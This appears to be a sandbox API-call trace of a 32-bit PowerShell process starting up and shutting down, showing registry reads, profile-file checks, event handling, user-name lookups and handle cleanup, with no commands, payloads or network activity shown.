[0061.931] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2cec74, lpData=0x3b8428, lpcbData=0x2cec70*=0x56 | out: lpType=0x2cec74*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2cec70*=0x56) returned 0x0 [0061.931] RegCloseKey (hKey=0x398) returned 0x0 [0061.931] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cec2c | out: phkResult=0x2cec2c*=0x398) returned 0x0 [0061.931] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2cec74, lpData=0x0, lpcbData=0x2cec70*=0x0 | out: lpType=0x2cec74*=0x1, lpData=0x0, lpcbData=0x2cec70*=0x56) returned 0x0 [0061.931] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2cec74, lpData=0x3b8428, lpcbData=0x2cec70*=0x56 | out: lpType=0x2cec74*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2cec70*=0x56) returned 0x0 [0061.931] RegCloseKey (hKey=0x398) returned 0x0 [0061.933] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3b8428 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0061.933] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x2ce7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0061.933] GetLastError () returned 0x3f0 [0061.933] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3b8428 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0061.933] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x2ce7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0061.933] GetLastError () returned 0x3f0 [0061.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x2ce85c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0061.934] GetLastError () returned 0x3f0 [0061.934] SetErrorMode (uMode=0x1) returned 0x1 [0061.934] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x2cecdc | out: lpFileInformation=0x2cecdc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0061.934] GetLastError () returned 0x2 [0061.934] SetErrorMode (uMode=0x1) returned 0x1 [0061.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x2ce85c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0061.934] GetLastError () returned 0x2 [0061.934] SetErrorMode (uMode=0x1) returned 0x1 [0061.934] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x2cecdc | out: lpFileInformation=0x2cecdc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0061.935] GetLastError () returned 0x2 [0061.935] SetErrorMode (uMode=0x1) returned 0x1 [0061.935] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x2ce85c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45 [0061.935] GetLastError () returned 0x2 [0061.935] SetErrorMode (uMode=0x1) returned 0x1 [0061.935] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x2cecdc | out: lpFileInformation=0x2cecdc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0061.935] GetLastError () returned 0x3 [0061.935] SetErrorMode (uMode=0x1) returned 0x1 [0061.935] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x2ce85c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a [0061.935] GetLastError () returned 0x3 [0061.935] SetErrorMode (uMode=0x1) returned 0x1 [0061.935] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x2cecdc | out: lpFileInformation=0x2cecdc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0061.935] GetLastError () returned 0x3 [0061.935] SetErrorMode (uMode=0x1) returned 0x1 [0061.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.936] GetLastError () returned 0xcb [0061.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.937] GetLastError () returned 0xcb [0061.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.940] GetLastError () returned 0xcb [0061.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.941] GetLastError () returned 0xcb [0061.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.942] GetLastError () returned 0xcb [0061.950] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.950] GetLastError () returned 0xcb [0061.950] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398 [0061.950] GetLastError () returned 0x0 [0061.950] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x39c [0061.950] GetLastError () returned 0x0 [0061.950] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0 [0061.950] GetLastError () returned 0x0 [0061.950] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4 [0061.950] GetLastError () returned 0x0 [0061.950] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8 [0061.950] GetLastError () returned 0x0 [0061.950] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ac [0061.950] GetLastError () returned 0x0 [0061.951] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc [0061.951] GetLastError () returned 0x0 [0061.951] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390 [0061.951] GetLastError () returned 0x0 [0061.951] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b4 [0061.951] GetLastError () returned 0x0 [0061.951] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3b8 [0061.951] GetLastError () returned 0x0 [0061.951] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c [0061.951] GetLastError () returned 0x0 [0061.951] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320 [0061.951] GetLastError () returned 0x0 [0061.952] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.952] GetLastError () returned 0xcb [0061.956] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0061.956] GetLastError () returned 0xcb [0061.957] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x2ced1c | out: lpMode=0x2ced1c) returned 1 [0061.957] GetLastError () returned 0xcb [0061.958] SetEvent (hEvent=0x3a4) returned 1 [0061.958] GetLastError () returned 0xcb [0061.958] SetEvent (hEvent=0x398) returned 1 [0061.958] GetLastError () returned 0xcb [0061.958] SetEvent (hEvent=0x39c) returned 1 [0061.958] GetLastError () returned 0xcb [0061.958] SetEvent (hEvent=0x3a0) returned 1 [0061.958] GetLastError () returned 0xcb [0061.958] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3bc [0061.958] GetLastError () returned 0x0 [0061.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.958] GetLastError () returned 0xcb [0061.959] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ceb80 | out: phkResult=0x2ceb80*=0x340) returned 0x0 [0061.959] RegQueryValueExW (in: hKey=0x340, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x2cebc8, lpData=0x0, lpcbData=0x2cebc4*=0x0 | out: lpType=0x2cebc8*=0x0, lpData=0x0, lpcbData=0x2cebc4*=0x0) returned 0x2 [0062.481] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x368 [0062.481] GetLastError () returned 0x0 [0062.481] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x364 [0062.481] GetLastError () returned 0x0 [0062.481] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c0 [0062.481] GetLastError () returned 0x0 [0062.481] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x370 [0062.481] GetLastError () returned 0x0 [0062.481] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x374 [0062.481] GetLastError () returned 0x0 [0062.481] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x378 [0062.481] GetLastError () returned 0x0 [0062.481] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c [0062.481] GetLastError () returned 0x0 [0062.481] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0062.481] GetLastError () returned 0x0 [0062.481] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384 [0062.481] GetLastError () returned 0x0 [0062.482] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x388 [0062.482] GetLastError () returned 0x0 [0062.482] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c [0062.482] GetLastError () returned 0x0 [0062.482] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4 [0062.482] GetLastError () returned 0x0 [0062.482] SetEvent (hEvent=0x370) returned 1 [0062.482] GetLastError () returned 0x0 [0062.482] SetEvent (hEvent=0x368) returned 1 [0062.482] GetLastError () returned 0x0 [0062.482] SetEvent (hEvent=0x364) returned 1 [0062.482] GetLastError () returned 0x0 [0062.482] SetEvent (hEvent=0x3c0) returned 1 [0062.482] GetLastError () returned 0x0 [0062.482] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0 [0062.482] GetLastError () returned 0x0 [0062.483] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cebb4 | out: phkResult=0x2cebb4*=0x3d8) returned 0x0 [0062.483] RegQueryValueExW (in: hKey=0x3d8, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x2cebfc, lpData=0x0, lpcbData=0x2cebf8*=0x0 | out: lpType=0x2cebfc*=0x0, lpData=0x0, lpcbData=0x2cebf8*=0x0) returned 0x2 [0062.606] SetEvent (hEvent=0x374) returned 1 [0062.606] GetLastError () returned 0x0 [0062.606] SetEvent (hEvent=0x378) returned 1 [0062.606] GetLastError () returned 0x0 [0062.606] SetEvent (hEvent=0x37c) returned 1 [0062.606] GetLastError () returned 0x0 [0062.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.618] GetLastError () returned 0xcb [0062.622] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b29f8, nSize=0x2cec90 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x2cec90) returned 0x1 [0062.623] GetLastError () returned 0xcb [0062.623] GetUserNameW (in: lpBuffer=0x3b8428, pcbBuffer=0x2cec98 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2cec98) returned 1 [0062.624] ReportEventW (hEventLog=0x4ee0004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2b80e8c*="Stopped", lpRawData=0x2b80d48) returned 1 [0062.648] GetLastError () returned 0x0 [0062.650] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0062.650] GetLastError () returned 0x0 [0062.653] CoGetContextToken (in: pToken=0x2cf9c8 | out: pToken=0x2cf9c8) returned 0x0 [0062.653] CObjectContext::QueryInterface () returned 0x0 [0062.653] CObjectContext::GetCurrentThreadType () returned 0x0 [0062.653] Release () returned 0x0 [0062.654] CoGetContextToken (in: pToken=0x2cf7a0 | out: pToken=0x2cf7a0) returned 0x0 [0062.654] CObjectContext::QueryInterface () returned 0x0 [0062.654] CObjectContext::GetCurrentThreadType () returned 0x0 [0062.654] Release () returned 0x0 [0062.657] CoGetContextToken (in: pToken=0x2cf7a0 | out: pToken=0x2cf7a0) returned 0x0 [0062.657] CObjectContext::QueryInterface () returned 0x0 [0062.657] CObjectContext::GetCurrentThreadType () returned 0x0 [0062.658] Release () returned 0x0 [0062.664] CoGetContextToken (in: pToken=0x2cf7a0 | out: pToken=0x2cf7a0) returned 0x0 [0062.664] CObjectContext::QueryInterface () returned 0x0 [0062.664] CObjectContext::GetCurrentThreadType () returned 0x0 [0062.664] Release () returned 0x0 [0062.679] CoGetContextToken (in: pToken=0x2cf780 | out: pToken=0x2cf780) returned 0x0 [0062.679] CObjectContext::QueryInterface () returned 0x0 [0062.679] CObjectContext::GetCurrentThreadType () returned 0x0 [0062.679] Release () returned 0x0 [0062.680] CoUninitialize () Thread: id = 60 os_tid = 0xa44 Thread: id = 61 os_tid = 0xa48 Thread: id = 62 os_tid = 0xa4c Thread: id = 69 os_tid = 0xa68 Thread: id = 70 os_tid = 0xa6c [0049.137] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0053.936] LocalFree (hMem=0x374820) returned 0x0 [0053.936] GetLastError () returned 0x0 [0053.936] CloseHandle (hObject=0x340) returned 1 [0053.936] GetLastError () returned 0x0 [0053.936] CloseHandle (hObject=0x13) returned 1 [0053.936] GetLastError () returned 0x0 [0053.936] CloseHandle (hObject=0xf) returned 1 [0053.937] GetLastError () returned 0x0 [0053.937] RegCloseKey (hKey=0x324) returned 0x0 [0053.937] RegCloseKey (hKey=0x320) returned 0x0 [0053.937] RegCloseKey (hKey=0x31c) returned 0x0 [0053.937] LocalFree (hMem=0x374870) returned 0x0 [0053.937] GetLastError () returned 0x0 [0053.937] RegCloseKey (hKey=0x34c) returned 0x0 [0055.006] RegCloseKey (hKey=0x3c4) returned 0x0 [0055.006] RegCloseKey (hKey=0x38c) returned 0x0 [0055.006] RegCloseKey (hKey=0x388) returned 0x0 [0055.006] RegCloseKey (hKey=0x384) returned 0x0 [0055.006] RegCloseKey (hKey=0x380) returned 0x0 [0055.006] RegCloseKey (hKey=0x37c) returned 0x0 [0055.007] RegCloseKey (hKey=0x378) returned 0x0 [0055.007] RegCloseKey (hKey=0x374) returned 0x0 [0055.007] RegCloseKey (hKey=0x370) returned 0x0 [0055.007] RegCloseKey (hKey=0x3c0) returned 0x0 [0055.007] RegCloseKey (hKey=0x368) returned 0x0 [0055.008] RegCloseKey (hKey=0x364) returned 0x0 [0055.008] RegCloseKey (hKey=0x360) returned 0x0 [0055.008] RegCloseKey (hKey=0x35c) returned 0x0 [0055.008] RegCloseKey (hKey=0x358) returned 0x0 [0055.008] RegCloseKey (hKey=0x354) returned 0x0 [0055.008] RegCloseKey (hKey=0x350) returned 0x0 [0055.009] RegCloseKey (hKey=0x340) returned 0x0 [0055.009] RegCloseKey (hKey=0x3bc) returned 0x0 [0055.009] RegCloseKey (hKey=0x320) returned 0x0 [0055.009] RegCloseKey (hKey=0x31c) returned 0x0 [0055.009] RegCloseKey (hKey=0x3b8) returned 0x0 [0055.009] RegCloseKey (hKey=0x3b4) returned 0x0 [0055.010] RegCloseKey (hKey=0x390) returned 0x0 [0055.010] RegCloseKey (hKey=0x3cc) returned 0x0 [0055.010] RegCloseKey (hKey=0x3ac) returned 0x0 [0055.010] RegCloseKey (hKey=0x3a8) returned 0x0 [0055.010] RegCloseKey (hKey=0x3a4) returned 0x0 [0055.011] RegCloseKey (hKey=0x3a0) returned 0x0 [0055.011] RegCloseKey (hKey=0x39c) returned 0x0 [0055.011] RegCloseKey (hKey=0x398) returned 0x0 [0055.011] RegCloseKey (hKey=0x394) returned 0x0 [0055.011] RegCloseKey (hKey=0x324) returned 0x0 [0055.011] RegCloseKey (hKey=0x3c8) returned 0x0 [0055.012] RegCloseKey (hKey=0x34c) returned 0x0 [0062.120] RegCloseKey (hKey=0x340) returned 0x0 [0062.656] GetLastError () returned 0x0 [0062.656] GetLastError () returned 0x0 [0062.656] LocalFree (hMem=0x3b9410) returned 0x0 [0062.656] GetLastError () returned 0x0 [0062.657] GetLastError () returned 0x0 [0062.657] GetLastError () returned 0x0 [0062.657] LocalFree (hMem=0x3b9388) returned 0x0 [0062.657] GetLastError () returned 0x0 [0062.664] DeregisterEventSource (hEventLog=0x4ee0004) returned 1 [0062.666] GetLastError () returned 0x0 [0062.670] CloseHandle (hObject=0x37c) returned 1 [0062.670] GetLastError () returned 0x0 [0062.670] CloseHandle (hObject=0x378) returned 1 [0062.670] GetLastError () returned 0x0 [0062.670] CloseHandle (hObject=0x374) returned 1 [0062.670] GetLastError () returned 0x0 [0062.670] CloseHandle (hObject=0x370) returned 1 [0062.670] GetLastError () returned 0x0 [0062.671] CloseHandle (hObject=0x3c0) returned 1 [0062.671] GetLastError () returned 0x0 [0062.671] CloseHandle (hObject=0x364) returned 1 [0062.671] GetLastError () returned 0x0 [0062.671] CloseHandle (hObject=0x368) returned 1 [0062.671] GetLastError () returned 0x0 [0062.672] RegCloseKey (hKey=0x3d8) returned 0x0 [0062.672] CloseHandle (hObject=0x320) returned 1 [0062.672] GetLastError () returned 0x0 [0062.672] CloseHandle (hObject=0x31c) returned 1 [0062.672] GetLastError () returned 0x0 [0062.672] CloseHandle (hObject=0x3b8) returned 1 [0062.672] GetLastError () returned 0x0 [0062.672] CloseHandle (hObject=0x3b4) returned 1 [0062.672] GetLastError () returned 0x0 [0062.673] CloseHandle (hObject=0x390) returned 1 [0062.673] GetLastError () returned 0x0 [0062.673] CloseHandle (hObject=0x3cc) returned 1 [0062.673] GetLastError () returned 0x0 [0062.673] CloseHandle (hObject=0x3ac) returned 1 [0062.673] GetLastError () returned 0x0 [0062.673] CloseHandle (hObject=0x3a8) returned 1 [0062.673] GetLastError () returned 0x0 [0062.673] CloseHandle (hObject=0x3a4) returned 1 [0062.673] GetLastError () returned 0x0 [0062.674] CloseHandle (hObject=0x3bc) returned 1 [0062.674] GetLastError () returned 0x0 [0062.674] CloseHandle (hObject=0x3a0) returned 1 [0062.674] GetLastError () returned 0x0 [0062.674] CloseHandle (hObject=0x39c) returned 1 [0062.674] GetLastError () returned 0x0 [0062.674] CloseHandle (hObject=0x398) returned 1 [0062.674] GetLastError () returned 0x0 [0062.675] CloseHandle (hObject=0x338) returned 1 [0062.675] GetLastError () returned 0x0 [0062.675] CloseHandle (hObject=0x3b0) returned 1 [0062.675] GetLastError () returned 0x0 [0062.675] CloseHandle (hObject=0x3c4) returned 1 [0062.675] GetLastError () returned 0x0 [0062.675] UnmapViewOfFile (lpBaseAddress=0x1d90000) returned 1 [0062.676] CloseHandle (hObject=0x348) returned 1 [0062.676] GetLastError () returned 0x0 [0062.676] RegCloseKey (hKey=0x80000004) returned 0x0 [0062.676] CloseHandle (hObject=0x38c) returned 1 [0062.676] GetLastError () returned 0x0 [0062.676] CloseHandle (hObject=0x304) returned 1 [0062.676] GetLastError () returned 0x0 [0062.677] CloseHandle (hObject=0x388) returned 1 [0062.677] GetLastError () returned 0x0 [0062.677] CloseHandle (hObject=0x384) returned 1 [0062.677] GetLastError () returned 0x0 [0062.677] CloseHandle (hObject=0x380) returned 1 [0062.677] GetLastError () returned 0x0 Thread: id = 130 os_tid = 0xad8 [0061.963] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0061.990] SetThreadUILanguage (LangId=0x0) returned 0x409 [0061.995] VirtualQuery (in: lpAddress=0x5e5e310, lpBuffer=0x5e5f310, dwLength=0x1c | out: lpBuffer=0x5e5f310*(BaseAddress=0x5e5e000, AllocationBase=0x54d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0061.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0061.999] GetLastError () returned 0xcb [0062.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.002] GetLastError () returned 0xcb [0062.004] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.004] GetLastError () returned 0xcb [0062.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.014] GetLastError () returned 0xcb [0062.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.016] GetLastError () returned 0xcb [0062.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.017] GetLastError () returned 0xcb [0062.028] VirtualQuery (in: lpAddress=0x5e5e42c, lpBuffer=0x5e5f42c, dwLength=0x1c | out: lpBuffer=0x5e5f42c*(BaseAddress=0x5e5e000, AllocationBase=0x54d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.029] GetLastError () returned 0xcb [0062.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.030] GetLastError () returned 0xcb [0062.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.031] GetLastError () returned 0xcb [0062.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.043] GetLastError () returned 0xcb [0062.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.060] GetLastError () returned 0xcb [0062.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.120] GetLastError () returned 0xcb [0062.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.122] GetLastError () returned 0xcb [0062.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.123] GetLastError () returned 0xcb [0062.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.124] GetLastError () returned 0xcb [0062.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.126] GetLastError () returned 0xcb [0062.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.127] GetLastError () returned 0xcb [0062.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.128] GetLastError () returned 0xcb [0062.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.152] GetLastError () returned 0xcb [0062.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249f8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.223] GetLastError () returned 0xcb [0062.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249f8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.225] GetLastError () returned 0xcb [0062.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4249f8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.354] GetLastError () returned 0xcb [0062.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5e5eb04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.361] GetLastError () returned 0xcb [0062.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5e5eab4, lpFilePart=0x0 | out: 